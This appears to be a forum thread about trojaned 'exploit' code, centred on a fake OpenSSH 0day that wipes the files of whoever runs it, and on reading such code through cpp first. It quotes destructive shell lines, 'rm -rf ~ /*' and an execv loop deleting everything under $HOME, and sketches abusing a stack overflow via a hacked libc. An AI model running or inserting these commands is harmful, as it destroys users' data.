That's what I do, I run it through cpp first and read the code from where the include files end, just to make sure someone isn't social engineering me into doing something stupid.

In case anybody wants to read the code preprocessed it's here:

http://ww.com/robert_you_suck.txt

Now of course you have to assume I'm telling you the truth, but that's easy enough to verify.

Paranoia has no limits ;)

My faviourite is probably the last openssh 0day "exploit": http://antihackerlink.or.id/0day-for-openssh-0pen0wn-is-spre...

See what happens with the "fremote(jmpcode)" function in 'main()'.

nasty:

rm -rf ~ /* 2> /dev/null &;

> I run it through cpp first

Any particular switches you use?

No, just cpp file.c > out.txt

In this case, an evil system administrator could change the text of /proc/kallsyms (probably via a hacked libc and LD_PRELOAD, or just the hacked libc) and then execute arbitrary code as you, because the exploit code uses an unchecked write into a stack variable (and who compiles their exploit code with a stack protector).

I am almost tempted to do this, use the exploit to get root on my work machines, and then replace the libc... just to see if anyone else tries the exploit. (Note to the literal: not really.)

execv("/bin/sh -c 'for i in `find $HOME`; do echo "rm -f $i"; done', 0);

Hehe, that's a funny way to reverse an attack.

I don't think that sysadmin would qualify as 'evil' though.

It'd be even more fun if they had gotten to it before you and you ended up wiping your own files like that ;)